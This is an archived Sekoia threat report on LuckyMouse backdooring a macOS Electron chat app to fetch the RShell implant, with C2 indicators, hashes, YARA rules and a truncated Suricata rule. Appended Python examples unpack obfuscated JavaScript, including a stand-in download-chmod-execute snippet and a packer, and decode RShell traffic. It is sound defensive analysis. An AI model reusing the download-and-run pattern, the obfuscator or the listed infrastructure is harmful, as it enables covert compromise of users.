{
	"id": "ab9c27d4-08b0-4d7d-8dda-99f8cccbf928",
	"created_at": "2026-04-06T00:18:16.070432Z",
	"updated_at": "2026-04-10T03:37:21.63697Z",
	"deleted_at": null,
	"sha1_hash": "86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a",
	"title": "LuckyMouse uses a backdoored Electron app to target MacOS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1127695,
	"plain_text": "LuckyMouse uses a backdoored Electron app to target MacOS\r\nBy Felix Aimé, Charles M. and Sekoia TDR\r\nPublished: 2022-08-12 · Archived: 2026-04-05 14:17:51 UTC\r\nThis blog post on LuckyMouse is an extract of the “FLINT 2022-045 – LuckyMouse uses a backdoored Electron app to target MacOS” report (SEKOIA.IO Flash Intelligence) sent to our clients on August 10, 2022.\r\nNote: TrendMicro has published on the same campaign under the title “Iron Tiger Compromises Chat Application Mimi, Targets Windows, Mac, and Linux Users”.\r\nTable of contents\r\nSummary\r\n“MìMì” Messenger backdooring\r\nRShell Mach-O implant\r\nLinks with LuckyMouse\r\nConclusion\r\nIOCs \u0026 Technical Details\r\nSummary\r\nDuring a review of the HyperBro Command and Control (C2) infrastructure linked to the China-nexus LuckyMouse intrusion set, SEKOIA spotted an unusual connection from an application. Further investigation identified this application as “MìMì” (秘秘 – “secret”, aka Mi). Mimi is a Chinese-language Electron app developed by Xiamen Baiquan Information Technology Co. Ltd. SEKOIA established that the MacOS version of “MìMì” Messenger has been trojanized since May 26, 2022 to download and execute a Mach-O binary dubbed “rshell”.\r\nAt this stage, SEKOIA is not able to assess the objective of this campaign. As this application’s use in China appears low, it is plausible that it was developed as a targeted surveillance tool. It is also likely that, following social engineering carried out by the operators, targeted users are encouraged to download this application, purportedly to circumvent Chinese authorities’ censorship.\r\nThis is not the first time that a messaging application dropping an implant connecting to LuckyMouse infrastructure has been observed. In 2020, our colleagues at ESET uncovered compromised versions of Able Desktop, a messaging application widely used in Mongolia, in the “StealthyTrident” operation.
In this campaign, Able Desktop was used to drop several implants, including PlugX, Tmanger and HyperBro, known to be part of the LuckyMouse tool set.\r\nHowever, this is the first time that SEKOIA has observed LuckyMouse targeting MacOS. Moreover, if this application is used exclusively by Chinese citizens, it would be the first time that we have identified LuckyMouse involved in domestic surveillance. This FLINT presents our findings on this campaign, including a description of the RShell implant and the associated IOCs.\r\n“MìMì” Messenger backdooring\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 1 of 8\r\nThe “Mi” application is an Electron messaging app available for Android, iOS, Windows and MacOS. As Mi is not widely promoted, and its website (www.mmimchat[.]com) displays no detailed description, terms of use or social media links, SEKOIA rapidly questioned its legitimacy.\r\nFigure 1. Mimi website at www.mmimchat[.]com\r\nMoreover, the files hosted on the website were last modified on July 26. Based on the Apple App Store change logs and passive DNS, we found that the first traces of this application date back to June 2020. However, SEKOIA was not able to assess whether this application is legitimate, or whether it was designed or repurposed as a surveillance tool. Additionally, based on our open source investigations, it is not possible to assess whether Xiamen Baiquan Information Technology Co. Ltd. is a legitimate company or a shell company.\r\nThe MacOS version of the “Mi” application is an Electron app packaged in an Apple Disk Image (DMG) file. The application appears to be functional: end users simply register to be able to chat with their contacts. However, in version 2.3.0, published on May 26, 2022, the ./mimi.app/Contents/Resources/app/electron-main.js file was trojanized.
As shown below, this was implemented by placing Dean Edwards packed JavaScript code at the beginning of the module.exports function.\r\nFigure 2. Backdoored electron-main.js file.\r\nThis code, executed at runtime, checks whether the platform is MacOS (darwin) and then downloads the “rshell” implant from 139.180.216[.]65, an IP address already associated with a LuckyMouse HyperBro C2. The retrieved payload is written to the temporary folder, given execute permission with chmod and then executed, as shown in the deobfuscated code:\r\nFigure 3. Code responsible for downloading and executing RShell.\r\nSEKOIA analysts checked the Windows, iOS and Android versions of the app and found no backdoor in the current versions. However, TrendMicro found older Linux and Windows versions backdoored (see the TrendMicro report cited above).\r\nRShell Mach-O implant\r\nThe downloaded implant, named RShell by its developers, is written in C++ and embeds the Boost.Asio and nlohmann/json libraries. This backdoor uses BSON (Binary JSON) over TCP sockets to communicate with its command and control server, without any encryption, and has no persistence mechanism.\r\nUpon execution, the RShell backdoor attempts to connect to the C2 server. This “Hello message” to the C2 server contains:\r\na random GUID, added to each response to the C2 server\r\nthe hostname\r\nthe IPv4 addresses\r\nthe type of connection (“login” for instance)\r\nthe current username\r\nthe kernel version.\r\nFigure 4. Hello packet from the implant.\r\nThe RShell backdoor accepts two “types” of commands: “cmd” and “file”.
\r\nThe “cmd” group contains three commands:\r\ninit(): starts a bash shell\r\ndata(data): writes data to the bash shell\r\nclose(): terminates the bash shell.\r\nThe second type of commands, “file”, enables interaction with the filesystem:\r\ndir(path): returns a list of files and subdirectories for the specified path\r\ninit(): returns a list of files and subdirectories for the root of the filesystem (equivalent to dir(“/”))\r\ndown(path): opens a file in binary read-only mode and returns the size of the file\r\nread(path): reads the specified file. The file must first have been opened with the down command\r\nupload(path): opens a file in binary write-only mode\r\nwrite(data, path): writes data to the specified file. As for the read command, the file must first have been opened with the upload command\r\ndel(path): deletes the specified file or directory\r\nclose(path): closes the file\r\nThe following figures present an example of request and response for the dir command.\r\nFigure 5. Example of dir request\r\nFigure 6. Example of dir response\r\nA keepalive message is sent to the C2 server every 40 seconds, and the server must echo this message. Based on this observation, we created a Suricata rule to spot this threat in your network flows (see Appendix).\r\nLinks with LuckyMouse\r\nInfrastructure links were established between the China-nexus intrusion set LuckyMouse and this operation.\r\nOf note, in the course of our investigation, the same HTTP server also served a HyperBro sample configured to communicate over HTTPS with 139.180.216[.]65. The malicious DLL of this HyperBro sample was signed with a certificate known to have been stolen and then used by LuckyMouse.
The files launching this sample were accessible at the following URLs:\r\nhxxp://139.180.216[.]65/dlpumgr32.exe\r\nhxxp://139.180.216[.]65/dlpprem32.dll\r\nhxxp://139.180.216[.]65/dlpprem32.bin\r\nSecondly, both LuckyMouse and the RShell operators use the same IP range, namely 103.79.76.0/22. While this IP range was recently used by LuckyMouse, notably to host three HyperBro C2 servers (103.79.77[.]200, 103.79.76[.]232, 103.79.78[.]48), two RShell C2 servers were also identified at 103.79.76[.]88 and 103.79.77[.]178.\r\nFinally, as documented by ESET, compromised messaging applications have already been leveraged by LuckyMouse in past activities, and this intrusion set has been observed using the Dean Edwards JavaScript packer in previous watering hole campaigns.\r\nConclusion\r\nBased on our investigations, SEKOIA associates this activity with LuckyMouse with high confidence. It is plausible that this activity indicates an expansion of LuckyMouse’s mandate, now including surveillance. However, as this intrusion set has mostly been observed continuously carrying out espionage activities, notably against the technology and governmental sectors, SEKOIA assesses this hypothesis to be unlikely.\r\nAt the time of writing, SEKOIA refrains from making any assessment on the intrusion set’s motivation and will continue to closely monitor its activities. Regardless of LuckyMouse’s goals, it is of particular interest to observe the targeting of MacOS environments.
SEKOIA assesses that this intrusion set will continue updating and improving its capabilities in the short term.\r\nIOCs \u0026 Technical Details\r\nRelated infrastructure\r\n103.79.76[.]88\r\n103.79.77[.]178\r\n139.180.216[.]65\r\nRShell hashes\r\n8c3be245cbbe9206a5d146017c14b8f965ab7045268033d70811d5bcc4b796ec rshell\r\n3a9e72b3810b320fa6826a1273732fee7a8e2b2e5c0fd95b8c36bbab970e830a rshell\r\nCompromised DMG images\r\nf6e0e5c9b9d43e008805644d937770b399f859cbba475ad837805d9adec13a2c 2.3.0.dmg\r\n4742c1987fdd968d7f094dc5a3ea3e9b5340b47e5a61846ac6ac7ae03fc7288f 2.3.1.dmg\r\n64e771c894616100202e83f3574f8accc8453138af6709367c99157e33bb613a 2.3.2.dmg\r\n466981b6aa38ae35a2c0e21a2066b4e803cc0bf76409eeb605892604c20ccf3a 2.3.3.dmg\r\nHyperBro implant\r\nWarning: dlpumgr32.exe is a legitimate file\r\nef2f20d1016cd39ff44f1399c8aa5c1ff5bfd4850d611ba375fbeff7f7e3eaf6 dlpprem32.bin\r\n22c3c2bf77a94ed5f207c00e240f558d6411308d237779ffb12e04bbe2c90356 dlpprem32.dll\r\n07758c93ba33843a9c5603f900f2ad0231c64ec77f6bba6de83ed6e2902022e4 dlpumgr32.exe\r\nYARA rules\r\nrule apt_LuckyMouse_RShell_strings {\r\n    meta:\r\n        id = \"89f18013-ea3e-440f-821e-cef102a43b7b\"\r\n        version = \"1.0\"\r\n        malware = \"RShell\"\r\n        intrusion_set = \"LuckyMouse\"\r\n        description = \"Detects LuckyMouse RShell Mach-O implant\"\r\n        source = \"SEKOIA\"\r\n        creation_date = \"2022-08-05\"\r\n        classification = \"TLP:WHITE\"\r\n    strings:\r\n        // \"dir\", \"path\", \"down\", \"read\", \"upload\", \"write\", \"del\" as adjacent NUL-terminated strings (file command vocabulary)\r\n        $ = { 64 69 72 00 70 61 74 68 00 64 6F 77 6E 00 72 65 61 64 00 75 70 6C 6F 61 64 00 77 72 69 74 65 00 64 65 6C }\r\n        // \"login\", \"hostname\", \"lan\", \"username\", \"version\" as adjacent NUL-terminated strings (hello message vocabulary)\r\n        $ = { 6C 6F 67 69 6E 00 68 6F 73 74 6E 61 6D 65 00 6C 61 6E 00 75 73 65 72 6E 61 6D 65 00 76 65 72 73 69 6F 6E }\r\n    condition:\r\n        uint32be(0) == 0xCFFAEDFE and\r\n        filesize \u003c 300KB and\r\n        all of them\r\n}\r\nNote that uint32be(0) == 0xCFFAEDFE only matches a thin 64-bit little-endian Mach-O; a universal (fat) binary, which starts with 0xCAFEBABE, would not match this rule.\r\nrule apt_LuckyMouse_Compromised_ElectronApp {\r\n    meta:\r\n        id = \"7702217d-771f-47af-8eaa-d5acf1e14f4d\"\r\n        version = \"1.0\"\r\n        intrusion_set = \"LuckyMouse\"\r\n        description = \"Detects compromised ElectronApp\"\r\n        source = \"SEKOIA\"\r\n        creation_date = \"2022-08-05\"\r\n        classification = \"TLP:WHITE\"\r\n    strings:\r\n        // packed stub placed at the very start of the trojanized electron-main.js\r\n        $s = \"module.exports=function(t){eval(function(p,a,c,k,e,r)\"\r\n    condition:\r\n        $s at 0 and filesize \u003c 100KB\r\n}\r\nSuricata rule\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (flow: from_client, established;content:\"|19 00 00 00 0\r\nTags: APT, APT27, BRONZE UNION, EMISSARY PANDA, Iron Tiger, LuckyMouse\r\nSource: https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/"
	],
	"report_names": [
		"luckymouse-uses-a-backdoored-electron-app-to-target-macos"
	],
	"threat_actors": [
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434696,
	"ts_updated_at": 1775792241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.pdf",
		"text": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.txt",
		"img": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.jpg"
	}
}
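The “MìMì” Messenger backdooring section of the archived report above describes a Dean Edwards packed stub prepended to the module.exports function of electron-main.js, and the apt_LuckyMouse_Compromised_ElectronApp YARA rule keys on that stub at offset 0. The following is an added example, not code from the Sekoia report or from the Mimi application: it applies the same offset-0 check in Python and unpacks "p,a,c,k,e,r" output so the downloader logic can be read in clear. The decoder stub string is the standard output of that packer; the simplified pack() exists only to build test input and assigns token indices sequentially rather than by frequency; the sample payload, the example.invalid URL and the helper names downloadTo, chmodExec and runDetached are constructed stand-ins mirroring the behaviour the report describes, not the real trojanized file.

```python
"""Added example (not Sekoia's code): flag the packed stub the page's YARA rule
keys on and unpack Dean Edwards "p,a,c,k,e,r" JavaScript to read the payload."""
import re

# Prefix from rule apt_LuckyMouse_Compromised_ElectronApp, matched at offset 0.
YARA_PREFIX = b"module.exports=function(t){eval(function(p,a,c,k,e,r)"

# Standard decoder stub emitted by the Dean Edwards packer (6-argument variant).
PACKER_STUB = (
    "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);"
    "k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}"
)
# Argument list that follows the stub: ('payload',radix,count,'kw|kw|...'.split('|'),0,{})
ARGS_RE = re.compile(
    r"\}\('(?P<p>(?:[^'\\]|\\.)*)',(?P<a>\d+),(?P<c>\d+),'(?P<k>[^']*)'\.split\('\|'\),0,\{\}\)\)"
)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def looks_backdoored(js: bytes, max_size: int = 100 * 1024) -> bool:
    """Mirror the YARA condition: $s at 0 and filesize < 100KB."""
    return len(js) < max_size and js.startswith(YARA_PREFIX)


def _encode(index: int, radix: int) -> str:
    """Packer symbol encoder: index -> base-`radix` token; digits above 35 become A-Z."""
    head = "" if index < radix else _encode(index // radix, radix)
    digit = index % radix
    return head + (chr(digit + 29) if digit > 35 else DIGITS[digit])


def _decode(token: str, radix: int) -> int:
    """Inverse of _encode; raises ValueError for anything that is not a packer token."""
    value = 0
    for ch in token:
        digit = ord(ch) - 29 if ch.isupper() else DIGITS.index(ch)
        if digit >= radix:
            raise ValueError(f"{ch!r} is not a base-{radix} digit")
        value = value * radix + digit
    return value


def pack(source: str, radix: int = 62) -> str:
    """Simplified packer used only to build test input: every \\w+ token gets a
    sequential index (the real packer orders by frequency); tokens that encode
    to themselves get an empty keyword slot, exactly as the real packer does."""
    words: dict = {}

    def substitute(match):
        word = match.group(0)
        words.setdefault(word, len(words))
        return _encode(words[word], radix)

    packed = re.sub(r"\b\w+\b", substitute, source)
    keywords = "|".join("" if _encode(i, radix) == w else w for w, i in words.items())
    payload = packed.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")
    return f"{PACKER_STUB}('{payload}',{radix},{len(words)},'{keywords}'.split('|'),0,{{}}))"


def unpack(packed: str) -> str:
    """Recover the source from p,a,c,k,e,r output by single-pass token substitution."""
    match = ARGS_RE.search(packed)
    if not match:
        raise ValueError("no p,a,c,k,e,r argument list found")
    radix, count = int(match["a"]), int(match["c"])
    keywords = match["k"].split("|")
    if len(keywords) != count:
        raise ValueError("keyword count does not match c")
    # Undo the JS single-quoted string escaping applied to the payload.
    payload = re.sub(r"\\(.)", lambda m: "\n" if m.group(1) == "n" else m.group(1), match["p"])

    def substitute(match):
        token = match.group(0)
        try:
            index = _decode(token, radix)
        except ValueError:
            return token
        return keywords[index] if index < count and keywords[index] else token

    return re.sub(r"\b\w+\b", substitute, payload)


def analyze(js: bytes) -> dict:
    """Triage one electron-main.js: YARA-style verdict plus the unpacked payload, if any."""
    verdict = {"backdoored": looks_backdoored(js), "unpacked": None}
    if verdict["backdoored"]:
        verdict["unpacked"] = unpack(js.decode("utf-8", "replace"))
    return verdict


# Constructed stand-in for the injected code (mirrors the behaviour the report
# describes; the URL and helper names are hypothetical, not the real payload).
SAMPLE_PAYLOAD = """if (process.platform === 'darwin') {
  downloadTo('http://example.invalid/rshell', tmpPath);
  chmodExec(tmpPath);
  runDetached(tmpPath);
}"""
CLEAN_MAIN = b"module.exports=function(t){t.whenReady().then(createWindow)}"
TROJANIZED_MAIN = (b"module.exports=function(t){" + pack(SAMPLE_PAYLOAD).encode()
                   + b";t.whenReady().then(createWindow)}")

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_MAIN), ("trojanized", TROJANIZED_MAIN)):
        print(name, analyze(blob))
```

The offset-0 check is deliberately as narrow as the YARA rule: it catches this specific stub placement and nothing else, so on a real triage it should be paired with unpack() over any p,a,c,k,e,r block found anywhere in the bundle's JavaScript.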
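The RShell Mach-O implant section of the archived report above describes unencrypted BSON over TCP, a hello message carrying a GUID, hostname, IPv4 addresses, connection type ("login"), username and kernel version, a "cmd"/"file" command vocabulary, and a keepalive every 40 seconds that the server must echo. The following is an added example, not the implant's or Sekoia's code: a minimal BSON encoder and decoder, a splitter that walks a TCP payload as back-to-back length-prefixed documents, a classifier over the key names the page's YARA strings list, and an echo finder for the keepalive pattern. The sample session is constructed, not a capture; the key that carries the GUID, the "type"/"cmd" layout of command documents and the keepalive body are assumptions of this example, since the page shows the real messages only in figures.

```python
"""Added example (not Sekoia's or RShell's code): a minimal BSON codec plus a
classifier for the RShell message vocabulary the report describes."""
import struct


def _element(key: str, value) -> bytes:
    """Encode one BSON element: type byte, NUL-terminated key, value."""
    k = key.encode() + b"\x00"
    if isinstance(value, bool):                       # must precede int (bool is an int)
        return b"\x08" + k + (b"\x01" if value else b"\x00")
    if isinstance(value, int):
        return b"\x10" + k + struct.pack("<i", value)
    if isinstance(value, str):
        v = value.encode() + b"\x00"
        return b"\x02" + k + struct.pack("<i", len(v)) + v
    if isinstance(value, bytes):                      # generic binary, subtype 0x00
        return b"\x05" + k + struct.pack("<i", len(value)) + b"\x00" + value
    if isinstance(value, dict):
        return b"\x03" + k + bson_encode(value)
    if isinstance(value, list):                       # arrays are documents keyed "0","1",...
        return b"\x04" + k + bson_encode({str(i): v for i, v in enumerate(value)})
    raise TypeError(f"unsupported value type {type(value).__name__}")


def bson_encode(doc: dict) -> bytes:
    """int32 little-endian total length, elements, terminating NUL."""
    body = b"".join(_element(k, v) for k, v in doc.items())
    return struct.pack("<i", len(body) + 5) + body + b"\x00"


def bson_decode(buf: bytes, pos: int = 0):
    """Decode the document starting at buf[pos]; returns (dict, end offset)."""
    if pos + 4 > len(buf):
        raise ValueError("truncated length prefix")
    (length,) = struct.unpack_from("<i", buf, pos)
    end = pos + length
    if length < 5 or end > len(buf) or buf[end - 1] != 0:
        raise ValueError("malformed BSON document")
    doc, p = {}, pos + 4
    while p < end - 1:
        kind = buf[p]
        z = buf.index(b"\x00", p + 1)
        key, p = buf[p + 1:z].decode(), z + 1
        if kind == 0x02:                              # string: int32 len (incl. NUL) + bytes
            (n,) = struct.unpack_from("<i", buf, p)
            doc[key], p = buf[p + 4:p + 3 + n].decode(), p + 4 + n
        elif kind in (0x03, 0x04):                    # embedded document / array
            sub, p = bson_decode(buf, p)
            doc[key] = list(sub.values()) if kind == 0x04 else sub
        elif kind == 0x05:                            # binary: int32 len + subtype + bytes
            (n,) = struct.unpack_from("<i", buf, p)
            doc[key], p = buf[p + 5:p + 5 + n], p + 5 + n
        elif kind == 0x08:
            doc[key], p = buf[p] == 1, p + 1
        elif kind == 0x10:
            (doc[key],) = struct.unpack_from("<i", buf, p)
            p += 4
        else:
            raise ValueError(f"unsupported BSON type 0x{kind:02x}")
    return doc, end


def iter_documents(stream: bytes):
    """Walk a raw TCP payload as back-to-back length-prefixed documents, yielding (doc, raw)."""
    pos = 0
    while pos < len(stream):
        doc, end = bson_decode(stream, pos)
        yield doc, stream[pos:end]
        pos = end


# Vocabulary taken from the report's command list and YARA strings.
HELLO_KEYS = {"hostname", "lan", "username", "version"}
SHELL_OPS = {"init", "data", "close"}
FILE_OPS = {"dir", "init", "down", "read", "upload", "write", "del", "close"}


def classify(doc: dict):
    """Label a document by RShell vocabulary; None when nothing matches. The hello
    check uses only key names from the YARA rule; the "type"/"cmd" layout of
    command documents is an assumption of this example."""
    if HELLO_KEYS.issubset(doc) and "login" in doc.values():
        return "hello"
    if doc.get("type") == "cmd" and doc.get("cmd") in SHELL_OPS:
        return "cmd:" + doc["cmd"]
    if doc.get("type") == "file" and doc.get("cmd") in FILE_OPS:
        return "file:" + doc["cmd"]
    return None


def find_echoes(client: bytes, server: bytes) -> list:
    """Documents the server returned byte-for-byte: the keepalive echo the report notes."""
    sent = {raw for _, raw in iter_documents(client)}
    return [doc for doc, raw in iter_documents(server) if raw in sent]


def session_labels(stream: bytes) -> list:
    return [classify(doc) for doc, _ in iter_documents(stream)]


# Constructed session (not a capture): GUID key, keepalive body and nesting are assumed.
GUID = "5f0c3d6e-2b2a-4c8f-9d3e-0a1b2c3d4e5f"
CLIENT_STREAM = b"".join(bson_encode(d) for d in (
    {"guid": GUID, "type": "login", "hostname": "mbp.local", "lan": ["192.168.1.23"],
     "username": "alice", "version": "21.6.0"},
    {"guid": GUID, "type": "ping"},
    {"guid": GUID, "type": "file", "cmd": "dir", "path": "/Users/alice"},
))
SERVER_STREAM = bson_encode({"guid": GUID, "type": "ping"})

if __name__ == "__main__":
    print(session_labels(CLIENT_STREAM), find_echoes(CLIENT_STREAM, SERVER_STREAM))
```

Because the framing is a plain little-endian int32 length with no encryption, the first four bytes of every client message are predictable for a fixed-size keepalive, which is what the page's Suricata rule matches on with content:"|19 00 00 00 ...|"; the decoder above is the analyst-side equivalent for confirming a hit by reading the document rather than matching bytes.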